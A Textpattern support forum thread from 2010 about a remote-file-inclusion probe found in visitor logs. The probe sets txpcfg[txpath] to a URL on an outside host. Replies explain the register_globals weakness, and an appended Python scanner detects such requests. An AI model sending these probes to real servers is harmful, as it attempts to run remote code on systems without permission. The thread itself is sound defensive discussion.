Textpattern CMS support forum
Queer referrer in visitor logs
Hi
I found that request in the visitor logs and want to know if someone knows what it's trying to achieve? Is it a hacking attempt?
/textpattern/publish.php?txpcfg[txpath]=http://www.passaat.com/passaat/foto/test.txt???
And this one also (same IP)
template/12//textpattern/publish.php?txpcfg[txpath]=http://www.passaat.com/passaat/foto/test.txt???
Thanks
Last edited by Dragondz (2010-02-02 12:59:49)
Re: Queer referrer in visitor logs
Dragondz wrote:
I found that request in the visitor logs and want to know if someone knows what it's trying to achieve? Is it a hacking attempt?
It’s trying to register globals via URL. It only “works” if you allow PHP to register globals from URLs. And allowing register_globals is a really bad idea – always.
Using an outdated server setup or bugs in used software (including plugins) might open these kinds of holes. Also remember to update TXP. Version 4.0.6 is the bare minimum (from a security update perspective), and the latest release is advised. If your server is configured correctly, that not-so-real attack does absolutely nothing.
Re: Queer referrer in visitor logs
Thanks for the clarifications, my txp install is 4.2.0 and register globals is always set to 0.
Re: Queer referrer in visitor logs
I take it that #php_value register_globals 0 means they are set to 0 on my server too?
Re: Queer referrer in visitor logs
# at the beginning means that the line is a comment. So, at least that line isn’t turning it off, as it is commented out. Although PHP’s default release configuration is set to 0 (false/off), who knows if it is set on by your host.
You can check the configuration with:
<txp:php>
echo 'Register_globals is: ' . ini_get('register_globals');
</txp:php>
in TXP’s page template.
Last edited by Gocom (2010-02-05 06:53:41)
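An added example, not part of the original thread: a small Python scanner that flags requests like the ones quoted in the first post, where a query parameter's value is a remote URL. It assumes Combined Log Format access logs; the function name and the sample lines (documentation IPs and hosts) are constructed for illustration, and it also covers URL-encoded values, which goes beyond the two requests shown above.

```python
import re
from urllib.parse import parse_qsl

# Request line of a Combined Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A decoded parameter value that begins with a remote scheme
REMOTE_VALUE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Feb/2010:12:40:01 +0000] "GET /textpattern/publish.php'
    '?txpcfg[txpath]=http://remote.example/test.txt??? HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.7 - - [02/Feb/2010:12:40:03 +0000] "GET /template/12//textpattern/publish.php'
    '?txpcfg[txpath]=http://remote.example/test.txt??? HTTP/1.1" 404 512 "-" "-"',
    # Same idea with the value URL-encoded
    '198.51.100.23 - - [02/Feb/2010:13:02:11 +0000] "GET /index.php'
    '?page=http%3A%2F%2Fremote.example%2Ftest.txt HTTP/1.1" 200 2048 "-" "-"',
    # Benign: "http" appears in a search term, not as a scheme
    '192.0.2.10 - - [02/Feb/2010:13:05:40 +0000] "GET /index.php'
    '?s=articles&q=http+status+codes HTTP/1.1" 200 4096 "-" "-"',
    # Benign: the URL is in the Referer field, not in the request target
    '192.0.2.10 - - [02/Feb/2010:13:06:02 +0000] "GET /articles/1 HTTP/1.1" 200 1024 '
    '"http://www.example.org/?u=http://other.example/" "-"',
]


def find_remote_include_probes(log_lines):
    """Return (client_ip, parameter_name, decoded_value) for each parameter
    in a request target whose value starts with http://, https:// or ftp://."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        # Only the request target is inspected, never the Referer field.
        query = match.group("target").partition("?")[2]
        # parse_qsl percent-decodes names and values before the check.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_VALUE_RE.match(value):
                hits.append((line.split(" ", 1)[0], name, value))
    return hits


if __name__ == "__main__":
    for ip, name, value in find_remote_include_probes(SAMPLE_LOG):
        print(f"{ip}  {name} = {value}")
```

Hits are leads for review rather than proof of compromise: some applications legitimately accept URLs in parameters such as redirect targets, so known-good parameter names may need to be excluded.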